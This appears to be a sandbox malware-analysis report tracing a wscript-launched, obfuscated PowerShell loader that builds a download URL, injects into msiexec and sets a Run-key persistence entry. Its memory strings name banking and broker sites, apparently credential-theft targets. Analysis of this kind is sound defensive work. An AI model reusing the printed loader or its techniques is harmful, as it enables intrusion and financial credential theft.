nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.Bai
              Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. 
vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.Bai
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FF936860988 push E95AFCD0h; ret 3_2_00007FF9368609C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FF9368651F5 push eax; ret 3_2_00007FF936865241
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FF9368691FA push eax; ret 3_2_00007FF936869251
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FF936865242 push eax; ret 3_2_00007FF936865241
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_088F288C push ebx; retf 6_2_088F288D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_088F4A86 push 4D6A6190h; iretd 6_2_088F4A8B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_088F2CBE push ebx; iretd 6_2_088F2CC5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_088F0E64 push esi; retf 6_2_088F0E65
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_088F1D85 push cs; retf 6_2_088F1D94
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_088F4BC1 push 49B4C2E3h; ret 6_2_088F4BC6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_088F39DC push esi; ret 6_2_088F3A32
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_088F251A push ecx; retf 6_2_088F2541
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_088F074C push ebx; ret 6_2_088F074F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_088F2B41 push ss; ret 6_2_088F2B44
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_088F4B7A push FFFFFFDAh; ret 6_2_088F4B7D
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04260E64 push esi; retf 15_2_04260E65
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04262CBE push ebx; iretd 15_2_04262CC5
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04264A86 push 4D6A6190h; iretd 15_2_04264A8B
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0426288C push ebx; retf 15_2_0426288D
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0426251A push ecx; retf 15_2_04262541
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04264B7A push FFFFFFDAh; ret 15_2_04264B7D
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04262B41 push ss; ret 15_2_04262B44
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0426074C push ebx; ret 15_2_0426074F
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04261D85 push cs; retf 15_2_04261D94
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04264BC1 push 49B4C2E3h; ret 15_2_04264BC6
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_042639DC push esi; ret 15_2_04263A32
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_20AB29E0 push ecx; ret 15_2_20AB3CA5
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_20AB3C90 push ecx; ret 15_2_20AB3CA5
              Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Litteraturlistes (listed twice)
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (79 identical entries)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 600000
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599890
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599781
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599672
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599562
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599453
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599343
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599234
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599125
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599015
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598906
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598795
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598685
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598576
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598463
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598359
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598250
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598140
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598031
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597922
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597812
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597703
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597594
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597484
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597375
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597265
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597156
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597035
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596922
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596812
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596703
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596594
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596484
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596375
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596264
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596156
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596045
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595897
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595777
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595650
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595541
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595437
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595313
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595187
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595078
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594968
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594859
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594750
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594640
              Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594531
              Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7502
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2329
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6916
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2846
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6908 | Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6324 | Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 7140 | Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep count: 33 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -30437127721620741s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -600000s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -599890s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5532 | Thread sleep count: 1683 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5532 | Thread sleep count: 8170 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -599781s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -599672s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -599562s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -599453s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -599343s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -599234s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -599125s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -599015s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -598906s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -598795s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -598685s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -598576s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -598463s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -598359s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -598250s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -598140s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -598031s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -597922s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -597812s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -597703s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -597594s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -597484s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -597375s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -597265s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -597156s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -597035s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -596922s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -596812s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -596703s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -596594s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -596484s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -596375s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -596264s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -596156s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -596045s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -595897s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -595777s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -595650s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -595541s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -595437s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -595313s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -595187s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -595078s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -594968s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -594859s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -594750s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -594640s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 352 | Thread sleep time: -594531s >= -30000s
              Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: svchost.exe, 00000008.00000002.2217806940.0000025D1C45A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2216286206.0000025D16E2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2215442340.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2215442340.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: powershell.exe, 00000003.00000002.1250880884.000002759B3BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: msiexec.exe, 0000000F.00000002.2215442340.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW l
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: msiexec.exe, 0000000F.00000002.2231687534.0000000021D49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_07020D20 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,6_2_07020D20

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
Source: Yara match | File source: amsi64_6564.amsi.csv, type: OTHER
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2032, type: MEMORYSTR
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p 